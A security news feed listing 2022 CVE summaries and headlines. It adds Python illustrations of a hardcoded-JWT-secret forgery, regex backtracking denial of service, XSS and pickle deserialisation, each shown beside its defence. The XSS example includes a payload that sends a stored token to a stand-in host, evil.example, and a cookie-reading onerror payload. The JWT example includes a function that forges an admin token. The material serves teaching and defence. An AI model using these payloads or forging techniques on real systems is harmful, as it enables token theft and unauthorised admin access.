‼ CVE-2022-37048 ‼
via "National Vulnerability Database".
The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_l2len_protocol at common/get.c:344. NOTE: this is different from CVE-2022-27941.
‼ CVE-2022-29507 ‼
via "National Vulnerability Database".
Insufficiently protected credentials in the Intel(R) Team Blue mobile application in all versions may allow an authenticated user to potentially enable information disclosure via local access.
⚠ Apple patches double zero-day in browser and kernel – update now! ⚠
via "Naked Security".
Double 0-day exploits - one in WebKit (to break in) and the other in the kernel (to take over). Patch now!
⚠ S3 Ep96: Zoom 0-day, AEPIC leak, Conti reward, healthcare security [Audio + Text] ⚠
via "Naked Security".
Latest episode - listen now (or read if you prefer!)
‼ CVE-2022-35540 ‼
via "National Vulnerability Database".
Hardcoded JWT Secret in AgileConfig <1.6.8 Server allows remote attackers to use the generated JWT token to gain administrator access.
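Why a secret that ships in the source code is fatal for HS256 tokens, and what a deployment check against it looks like. This is an added example for the AgileConfig entry above, not AgileConfig's code: the placeholder secret "changeme", the claim names, the admin role check and the 32-byte minimum are all assumptions made for the illustration.

```python
"""HS256 JWT forgery with a known shared secret, and the deployment check that
stops it.  Added illustration for the AgileConfig hardcoded-secret entry above;
this is not AgileConfig's code.  The placeholder secret, claim names and the
32-byte minimum are assumptions made for the example."""
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# Constructed stand-in for a secret committed to source control.  Anyone who can
# read the code can mint tokens the server will accept.
HARDCODED_SECRET = "changeme"
KNOWN_PLACEHOLDERS = {"changeme", "secret", "password", "default", ""}


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims: dict, secret: str) -> str:
    """Compact HS256 JWT: b64url(header).b64url(claims).b64url(HMAC-SHA256)."""
    header = {"alg": "HS256", "typ": "JWT"}
    parts = [_b64url(json.dumps(obj, separators=(",", ":")).encode()) for obj in (header, claims)]
    signing_input = ".".join(parts)
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(mac)}"


def verify_jwt(token: str, secret: str) -> Optional[dict]:
    """Return the claims if the MAC matches and the token is unexpired, else None.
    The algorithm is fixed to HS256; the header's 'alg' is checked, never obeyed."""
    try:
        h64, p64, s64 = token.split(".")
        header = json.loads(_b64url_decode(h64))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None
        expected = hmac.new(secret.encode(), f"{h64}.{p64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(s64)):
            return None
        claims = json.loads(_b64url_decode(p64))
    except ValueError:          # wrong part count, bad base64, bad JSON
        return None
    exp = claims.get("exp") if isinstance(claims, dict) else None
    if not isinstance(exp, (int, float)) or exp < time.time():
        return None
    return claims


def is_admin_request(token: str, secret: str) -> bool:
    """The authorization decision an admin endpoint makes from the token alone."""
    claims = verify_jwt(token, secret)
    return claims is not None and claims.get("role") == "admin"


def forge_admin_token(leaked_secret: str) -> str:
    """Attacker side: mint an admin token offline with the secret read from source."""
    return sign_jwt({"sub": "attacker", "role": "admin", "exp": int(time.time()) + 3600}, leaked_secret)


def secret_is_acceptable(secret: str) -> bool:
    """Startup check: refuse known placeholders and anything shorter than 32 bytes."""
    return secret.lower() not in KNOWN_PLACEHOLDERS and len(secret.encode()) >= 32


def generate_deployment_secret() -> str:
    """Per-deployment secret (256 bits), generated at install time, never committed."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    forged = forge_admin_token(HARDCODED_SECRET)
    print("forged token accepted under hardcoded secret:", is_admin_request(forged, HARDCODED_SECRET))
    rotated = generate_deployment_secret()
    print("same token accepted after rotation:", is_admin_request(forged, rotated))
    print("hardcoded secret passes startup check:", secret_is_acceptable(HARDCODED_SECRET))
    print("generated secret passes startup check:", secret_is_acceptable(rotated))
```

The server-side verification here is correct; the flaw is entirely in key management. Once the secret is public, every HMAC it produced is attacker-producible, so the fix is to rotate to a per-deployment random value (which also invalidates every token issued under the old one) and to refuse to start on a placeholder.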
‼ CVE-2020-36599 ‼
via "National Vulnerability Database".
lib/omniauth/failure_endpoint.rb in OmniAuth before 2.0 does not escape the message_key value.
‼ CVE-2022-1901 ‼
via "National Vulnerability Database".
In affected versions of Octopus Deploy it is possible to unmask sensitive variables by using variable preview.
‼ CVE-2022-2074 ‼
via "National Vulnerability Database".
In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service using the Variable Project Template.
‼ CVE-2022-2049 ‼
via "National Vulnerability Database".
In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service via the package upload function.
‼ CVE-2022-2075 ‼
via "National Vulnerability Database".
In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service targeting the build information request validation.
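The three Octopus Deploy entries above share one bug class: a validation regex whose nested quantifiers let the engine try exponentially many ways to match before giving up. The following is an added example, not Octopus Deploy code; the "project template name" grammar, the 200-character cap and the sample inputs are constructed to show the failure mode and the two standard defences.

```python
"""Catastrophic regex backtracking and two defences: a linear-time pattern and a
length cap applied before the regex runs.  Added illustration for the three
Octopus Deploy ReDoS entries above; this is not Octopus Deploy code.  The
'project template name' grammar is constructed for the example."""
import re
import time

# Constructed grammar: words, each optionally followed by a single space.
# (\w+\s?)+ lets the engine split a run of word characters between iterations
# in every possible way, so a non-matching tail ('!') costs ~2^n attempts.
VULNERABLE = re.compile(r"^(\w+\s?)+$")

# Same language, written so every boundary is forced: a run of word characters
# can only end at a space or at the end of input, so there is one way to match.
SAFE = re.compile(r"^\w+(?:\s\w+)*\s?$")

MAX_TEMPLATE_NAME = 200   # assumed limit; pick the smallest the product can live with

# Constructed inputs: valid names, invalid names, and one that fails at the end.
SAMPLES = ["Project", "My Project", "a b c", "trailing ", " leading",
           "double  space", "", "Proj-ect", "aaaaa!"]


def patterns_agree(samples=SAMPLES) -> bool:
    """Both patterns accept and reject exactly the same inputs."""
    return all((VULNERABLE.match(s) is None) == (SAFE.match(s) is None) for s in samples)


def validate_template_name(name: str, pattern=SAFE) -> bool:
    """Cheap length check first; the regex never sees oversized input."""
    if len(name) > MAX_TEMPLATE_NAME:
        return False
    return pattern.match(name) is not None


def time_match(pattern, text: str) -> float:
    """Seconds spent evaluating pattern against text once."""
    start = time.perf_counter()
    pattern.match(text)
    return time.perf_counter() - start


if __name__ == "__main__":
    print("patterns agree on samples:", patterns_agree())
    # Each extra 'a' roughly doubles VULNERABLE's time; SAFE stays flat.
    for n in (16, 18, 20):
        payload = "a" * n + "!"
        print(f"n={n}: vulnerable {time_match(VULNERABLE, payload):.3f}s  "
              f"safe {time_match(SAFE, payload):.6f}s")
    print("oversized input rejected before regex:", validate_template_name("a" * 5000 + "!"))
```

Rewriting the pattern is the real fix; the length cap is the backstop for patterns you have not audited yet, and it belongs in front of any regex that runs on unauthenticated input such as an upload name or a build-information request.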
🗓️ API security: Broken access controls, injection attacks plague the enterprise security landscape in 2022 🗓️
via "The Daily Swig".
Spring4Shell and Veeam RCE exploit topped the list in Q1 2022
🔏 Friday Five 8/19 🔏
Security issues in Apple devices and one of the largest DDoS attacks on record dominated the headlines this week. Read about these stories and more all in this week's Friday Five!
‼ CVE-2022-2886 ‼
via "National Vulnerability Database".
A vulnerability, which was classified as critical, was found in Laravel 5.1. Affected is an unknown function. The manipulation leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-206688.
‼ CVE-2022-35910 ‼
via "National Vulnerability Database".
In Jellyfin before 10.8, stored XSS allows theft of an admin access token.
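The OmniAuth message_key entry and the Jellyfin stored-XSS entry above are the same mistake in two places: a value the attacker controls is written into HTML without escaping, and a stored variant lets the script run in an administrator's browser, where a token kept in browser storage is within reach. The block below is an added example and is neither project's code; the page template, the message_key payload and the display-name payload are constructed.

```python
"""An attacker-controlled value written into HTML without escaping, beside the
escaped rendering.  Added illustration for the OmniAuth message_key entry and the
Jellyfin stored-XSS entry above; it is neither project's code.  The template, the
message_key value and the display name are constructed for the example."""
import html
import re

# Constructed payloads.  The first closes the attribute it lands in and injects
# a script that exfiltrates a token from browser storage; the second needs no
# script tag at all.
MESSAGE_KEY = '"><script>fetch("//evil.example/?t="+localStorage.token)</script>'
DISPLAY_NAME = "<img src=x onerror=alert(document.cookie)>"

TEMPLATE_TAGS = 2   # the template itself contributes <p ...> and </p>
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")


def render_failure_unsafe(message_key: str) -> str:
    """Vulnerable: the value is concatenated into attribute and text context verbatim."""
    return f'<p class="error" data-key="{message_key}">Authentication failure: {message_key}</p>'


def render_failure_safe(message_key: str) -> str:
    """html.escape(quote=True) turns < > & " ' into entities, so the value can
    neither close the attribute nor open a tag in either context."""
    safe = html.escape(message_key, quote=True)
    return f'<p class="error" data-key="{safe}">Authentication failure: {safe}</p>'


def normalize_message_key(key: str) -> str:
    """Defence in depth: a failure key is an identifier, so allow-list its shape
    and fall back to a fixed value rather than echoing arbitrary input."""
    return key if re.fullmatch(r"[a-z0-9_]{1,64}", key) else "unknown"


def introduces_markup(rendered: str) -> bool:
    """Does the rendered fragment contain more '<tag' sequences than the template has?"""
    return len(TAG_RE.findall(rendered)) > TEMPLATE_TAGS


if __name__ == "__main__":
    for label, render in (("unsafe", render_failure_unsafe), ("safe", render_failure_safe)):
        for payload in (MESSAGE_KEY, DISPLAY_NAME):
            out = render(payload)
            print(f"{label:6} injects markup: {introduces_markup(out)}\n   {out}")
    print("normalized:", normalize_message_key(MESSAGE_KEY), "/",
          normalize_message_key("invalid_credentials"))
```

Escaping at output time is the fix that generalises; the allow-list on message_key is the extra step available when the value is an identifier rather than free text. Neither helps if the token itself is stored where script can read it, which is why the second half of the Jellyfin entry (token theft) is worth treating as a separate finding.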
‼ CVE-2022-35909 ‼
via "National Vulnerability Database".
In Jellyfin before 10.8, the /users endpoint has incorrect access control for admin functionality.
‼ CVE-2022-2889 ‼
via "National Vulnerability Database".
Use After Free in GitHub repository vim/vim prior to 9.0.0224.
‼ CVE-2022-36220 ‼
via "National Vulnerability Database".
Kiosk breakout (without quit password) in Safe Exam Browser (Windows) <3.4.0, which allows an attacker to achieve code execution via the browser's print dialog.
‼ CVE-2022-1021 ‼
via "National Vulnerability Database".
Insecure Storage of Sensitive Information in GitHub repository chatwoot/chatwoot prior to 2.6.0.
‼ CVE-2022-29805 ‼
via "National Vulnerability Database".
A Java Deserialization vulnerability in the Fishbowl Server in Fishbowl Inventory before 2022.4.1 allows remote attackers to execute arbitrary code via a crafted XML payload.
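The Laravel entry above and this Fishbowl entry are both native deserialization of attacker-supplied data: the serialized bytes name a type or callable, and the loader invokes it. The block below is an added Python analogue using pickle, not PHP, not Java, and not either project's code; the gadget only appends to a list where a real chain would run a command, and the allow-list of permitted globals is an assumption for the example.

```python
"""Unsafe deserialisation: attacker-supplied bytes name a callable that the
loader invokes.  Added Python analogue (pickle) for the Laravel and Fishbowl
deserialisation entries above; it is not PHP or Java and not either project's
code.  The gadget callable and the allow-list are constructed."""
import builtins
import io
import pickle

CALLS: list = []   # records what the gadget managed to execute


def record_call(arg: str) -> str:
    """Stands in for os.system / subprocess in a real gadget chain: it only logs."""
    CALLS.append(arg)
    return arg


class Gadget:
    """A type whose reduction tells the unpickler to call record_call('pwned')."""
    def __reduce__(self):
        return (record_call, ("pwned",))


def attacker_payload() -> bytes:
    """Bytes an attacker would send; nothing about them looks like a Gadget on the wire."""
    return pickle.dumps(Gadget(), protocol=4)


def benign_payload() -> bytes:
    """What legitimate clients send: plain containers, no global references."""
    return pickle.dumps({"items": [1, 2, 3], "total": 4.5}, protocol=4)


def load_unsafe(data: bytes):
    """What the vulnerable server does: deserialise whatever it received."""
    return pickle.loads(data)


SAFE_BUILTINS = {"dict", "list", "set", "frozenset", "tuple", "str", "int", "float", "bool", "bytes"}


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve globals only from an explicit allow-list; refuse everything else."""
    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_safe(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo_unsafe() -> list:
    """Returns what the gadget executed during an unrestricted load."""
    CALLS.clear()
    load_unsafe(attacker_payload())
    return list(CALLS)


def demo_safe() -> str:
    """Returns 'refused' if the restricted loader stopped the gadget before it ran."""
    CALLS.clear()
    try:
        load_safe(attacker_payload())
    except pickle.UnpicklingError:
        return "refused" if not CALLS else "executed"
    return "executed"


if __name__ == "__main__":
    print("unrestricted load executed:", demo_unsafe())
    print("restricted load:", demo_safe())
    print("restricted load of benign data:", load_safe(benign_payload()))
```

The allow-list is the pattern that carries across languages (PHP's `unserialize(..., ['allowed_classes' => [...]])` and Java's `ObjectInputFilter` serve the same role); the more robust answer is to not accept a native serialization format from untrusted parties at all and parse a data-only format such as JSON into explicit types.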
🕴 Cyber Resiliency Isn't Just About Technology, It's About People 🕴
via "Dark Reading".
To lessen burnout and prioritize staff resiliency, put people in a position to succeed with staffwide cybersecurity training to help ease the burden on IT and security personnel.
❌ iPhone Users Urged to Update to Patch 2 Zero-Days ❌
via "Threat Post".
Apple is urging macOS, iPhone and iPad users to install this week's updates immediately; they include fixes for two zero-days under active attack. The patches are for vulnerabilities that allow attackers to execute arbitrary code and ultimately take over devices. iOS 15.6.1 and macOS Monterey 12.5.1 both patch the two flaws, which basically impact […]
Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.